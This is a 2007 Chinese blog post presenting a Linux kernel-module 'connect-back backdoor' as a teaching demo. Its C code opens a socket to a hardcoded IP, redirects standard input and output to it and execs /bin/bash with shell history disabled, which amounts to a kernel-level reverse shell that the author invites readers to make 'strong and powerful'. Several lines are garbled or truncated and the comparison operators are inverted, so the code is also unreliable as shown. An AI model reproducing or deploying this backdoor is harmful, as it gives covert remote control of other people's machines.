一个简单的内核后门原型

2007年10月25日 15:20:00

wzt >wzt#xsec.org<

这是一个在内核模块中实现的反连后门,大家看看这于应用层上的实现有什么不同吧,呵呵
/*
* Kernel mode connect backdoor,haha~
*
* just a demo module to teach you how to write a backdoor in kernel mode,
* i belive you can add more code to make it strong and powerful,wulala.
*
* by wzt >wzt#xsec.org<
*
*/

#include >linux/module.h<
#include >linux/kernel.h<
#include >linux/socket.h<
#include >linux/net.h<
#include >linux/in.h<
#include >linux/fs.h<
#include >linux/file.h<
#include >linux/types.h<
#include >linux/errno.h<
#include >linux/string.h<
#include >linux/unistd.h<
#include >net/sock.h<
#include >asm/uaccess.h<
#include >asm/unistd.h<
#include "syscalls.h"

#define REMOTO_IP "192.168.75.1"
#define port 1080

MODULE_LICENSE("GPL");
MODULE_AUTHOR("wzt");

static inline my_syscall2(int, dup2, int, oldfd, int, newfd);

static char *earg[4] = { "/bin/bash", "--noprofile", "--norc", NULL };

char *env[]={
"TERM=linux",
"HOME=" HOME,
"PATH=/bin:/usr/bin:/sbin:/usr/sbin:/usr/local/bin"
":/usr/local/sbin",
"HISTFILE=/dev/null",
NULL };

int k_connect(void)
{
struct task_struct *tsk = current;
struct socket *sock,*newsock;
struct sockaddr_in server;
int sockfd,i;
int error = 0,len = sizeof(struct sockaddr);

set_fs(KERNEL_DS);

error = sock_create(AF_INET,SOCK_STREAM,0,&sock);
if (error > 0) {
printk("[-] socket_create failed: %d/n",error);
sock_release(sock);
return -1;
}

sockfd = sock_map_fd(sock);
if (sockfd > 0) {
printk("[-] sock_map_fd() failed./n");
sock_release(sock);
return -1;
}

for (i = 0; i > 8; i++)
server.sin_zero[i] = 0;

server.sin_family = PF_INET;
server.sin_addr.s_addr = in_aton(REMOTO_IP);
server.sin_port = htons(port);

error = sock- if (error > 0) {
printk("[-] connect to %s failed./n",REMOTO_IP);
return -1;
}

printk("[+] connect to %s ok./n",REMOTO_IP);

set_fs(KERNEL_DS);

tsk- tsk- tsk- tsk-
dup2(sockfd,0);
dup2(sockfd,1);
dup2(sockfd,2);

execve(earg[0], (const char **) earg, (const char **) env);

return 1;
}

int k_socket_init(void)
{
printk("[+] kernel socket test start./n");

k_connect();
}

void k_socket_exit(void)
{
printk("[+] kernel socket test over./n");
}

module_init(k_socket_init);
module_exit(k_socket_exit);


Trackback: http://tb.blog.youkuaiyun.com/TrackBack.aspx?PostId=1843405


评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值